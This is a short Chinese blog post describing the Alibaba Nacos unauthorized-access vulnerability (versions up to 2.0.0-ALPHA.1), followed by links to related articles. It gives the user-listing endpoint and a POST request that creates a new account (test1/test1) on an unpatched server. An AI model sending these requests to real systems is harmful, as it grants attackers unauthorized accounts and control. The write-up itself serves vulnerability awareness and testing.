首页 > 其他分享 >Nacos 未授权访问漏洞测试

Nacos 未授权访问漏洞测试

时间:2024-03-26 10:56:02浏览次数:18  
标签:test1 http IP nacos Nacos 漏洞 授权

漏洞描述:2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作

影响版本:
Nacos <= 2.0.0-ALPHA.1

漏洞地址:GET http://IP:端口/nacos/v1/auth/users?pageNo=1&pageSize=9

利用方式:POST http://IP:端口/nacos/v1/auth/users?username=test1&password=test1

 

加账户密码登录

 

 

标签:test1,http,IP,nacos,Nacos,漏洞,授权
From: https://www.cnblogs.com/websec80/p/18096100

相关文章

  • 使用systemd部署r-nacos
    1、前言r-nacos是一个用rust实现的nacos服务。相较于javanacos来说,是一个提供相同功能,启动更快、占用系统资源更小(初始内存小于10M)、性能更高、运行更稳定的服务。r-nacos设计上完全兼容最新版本nacos面向clientsdk的协议(包含1.x的httpOpenApi,和2.x的grpc协议),支持使用nac......
  • nacos2.x 启动出错问题分析
    **nacos2.x启动出错问题分析**nacos2.0以上,双击startup.cmd闪退,或者cmd下执行startup启动时报错分析nacos2.x以上,默认以集群方式启动,如果你未配置相关集群参数,就会启动闪退或报错所以单机模式启动需加参数启动服务。图片nacos2.0-1.png解决:添加参数,以改变......
  • 永恒之蓝漏洞复现(ms17-010)
    永恒之蓝漏洞复现(ms17-010)环境信息收集先扫描目标靶机IP进入MSF查看是否存在永恒之蓝的漏洞攻击永恒之蓝漏洞复现(ms17-010)环境攻击机:kali靶机:WindowsServer2008信息收集对ip进行收集开放什么端口先扫描目标靶机IP因为在同一个内网之中所以可以使用arp-......
  • XSS漏洞
    原理程序对输入和输出没有做合适的处理,导致恶意字符输出在前端时被浏览器当作有效代码解析执行后端代码将用户输入的字符当成了js代码去执行xss常用代码<script>alert(/xss/)onclick='alert(1)'onclick属性是HTML元素中的一个事件属性,它用于指定在元素被点击时执行......
  • vscan开源、轻量、快速、跨平台 的网站漏洞扫描工具
    https://github.com/veo/vscan 编译/安装/运行•参数说明•使用方法•使用场景•POC列表•自定义扫描器Features特征vscan快速的端口扫描、指纹探测功能快速的登录密码爆破功能快速的POC检测功能快速的敏感文件检测功能轻量、开源、跨平台使用支持指纹650(eHole)......
  • 运行单机模式Nacos
    可以使用2种方式运行单机模式的Nacos服务:编译后的压缩包,从源码启动。如下示例基于MySQL数据库。基于编译后的压缩包启动Nacos服务下载最新的nacos-server-2.2.3稳定版并解压:$unzipnacos-server-$version.zip或者tar-xvfnacos-server-$version.tar.gz$cdnacos#解压......
  • SpringCloud之Nacos
    SpringCloud之Nacosnacos作为注册中心服务提供者添加依赖<dependency><groupId>com.alibaba.cloud</groupId><artifactId>spring-cloud-starter-alibaba-nacos-discovery</artifactId></dependency>配置Nacos注册中心spring:application......
  • 【漏洞复现】福建科立迅通信指挥调度平台pwd_update.php SQL注入漏洞 (CVE-2024-2621)
        免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。          ......
  • 城管智慧执法系统源码有演示,自主研发,功能完善,正版授权,可商用上项目。
     城管智慧执法系统源码有演示,自主研发,功能完善,正版授权,可商用上项目。   一套数字化的城管综合执法办案系统源码,提供了案件在线办理、当事人信用管理、文书电子送达、沿街店铺视频智能分析等功能,全面赋能执法队员,提高执法队员办案效率。手机端实现考勤、数据采集、上......
  • Web漏洞--数据库注入
    数据库注入Access、mysql、mssql、mongDB、postgresql、sqlite、oracle、sybase等#上节课JSON注入案例分析天池大数据众智平台-阿里云天池所以json注入时要在1、2、3上面去注入#简要学习各种数据库的注入特点数据库架构组成,数据库高权限操作Access是低等级的数据库,依......